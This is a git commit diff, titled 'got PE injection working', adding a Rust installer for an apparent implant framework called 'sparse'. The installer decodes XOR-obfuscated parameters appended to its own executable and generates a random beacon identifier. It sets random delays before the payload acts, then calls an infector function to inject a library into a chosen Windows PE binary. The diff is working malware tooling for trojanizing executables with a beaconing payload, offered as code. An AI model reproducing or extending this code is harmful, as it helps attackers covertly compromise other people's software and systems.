feat: got PE injection working

2025-02-08 20:51:03 -05:00
parent cd2890ee36
commit 8d47ac128d
12 changed files with 784 additions and 18 deletions
--- a/sparse-windows-installer/Cargo.toml
+++ b/sparse-windows-installer/Cargo.toml
@@ -4,3 +4,8 @@ edition = "2024"
 version.workspace = true

 [dependencies]
+hex = "0.4.3"
+rand = "0.9.0"
+sparse-actions = { version = "2.0.0", path = "../sparse-actions" }
+sparse-windows-infector = { version = "2.0.0", path = "../sparse-windows-infector" }
+structopt = "0.3.26"
--- a/sparse-windows-installer/src/main.rs
+++ b/sparse-windows-installer/src/main.rs
@@ -1,3 +1,76 @@
-fn main() {
-    println!("Hello");
+use std::{
+    fs::OpenOptions,
+    io::{prelude::*, Error, SeekFrom},
+    path::PathBuf,
+};
+
+use rand::{rngs::OsRng, TryRngCore};
+use structopt::StructOpt;
+
+use sparse_actions::payload_types::{Parameters, XOR_KEY};
+use sparse_windows_infector::infect_pe_binary;
+
+#[derive(StructOpt, Debug)]
+#[structopt(name = "sparse-installer")]
+struct Options {
+    /// Path to binary to infect
+    #[structopt(short, long)]
+    binary: PathBuf,
+
+    /// Path for where to store the library that sparse uses;
+    /// must be somewhere in the library search path (e.g., /lib/x86_64-linux-gnu)
+    #[structopt(short, long)]
+    library_path: PathBuf,
+
+    /// How long to randomly wait (minimum) after being loaded before causing tomfoolery
+    #[structopt(long, default_value = "0")]
+    delay_seconds_minimum: u8,
+
+    /// How long to randomly wait (maximum) after being loaded before causing tomfoolery
+    #[structopt(long, default_value = "0")]
+    delay_seconds_maximum: u8,
+}
+
+fn main() -> Result<(), Error> {
+    let opts = Options::from_args();
+
+    if opts.delay_seconds_minimum > opts.delay_seconds_maximum {
+        eprintln!("Delay seconds minimum should be larger than delay seconds maximum!");
+        panic!();
+    }
+
+    let mut installer_file = OpenOptions::new()
+        .read(true)
+        .open(std::env::current_exe()?)?;
+
+    let parameters_size = std::mem::size_of::<Parameters>() as i64;
+
+    installer_file.seek(SeekFrom::End(-parameters_size))?;
+
+    let mut parameters_buffer = Vec::with_capacity(parameters_size as usize);
+    installer_file.read_to_end(&mut parameters_buffer)?;
+
+    for b in parameters_buffer.iter_mut() {
+        *b = *b ^ (XOR_KEY as u8);
+    }
+
+    let parameters: &mut Parameters =
+        unsafe { std::mem::transmute(parameters_buffer.as_mut_ptr()) };
+
+    let mut identifier = [0u8; 32];
+    OsRng
+        .try_fill_bytes(&mut identifier)
+        .expect("Could not generate beacon identifier");
+
+    let hex_ident = hex::encode(&identifier);
+    parameters
+        .beacon_identifier
+        .copy_from_slice(&hex_ident.as_bytes());
+
+    parameters.delay_seconds_min = opts.delay_seconds_minimum;
+    parameters.delay_seconds_max = opts.delay_seconds_maximum;
+
+    infect_pe_binary(opts.binary, opts.library_path, parameters_buffer)?;
+
+    Ok(())
 }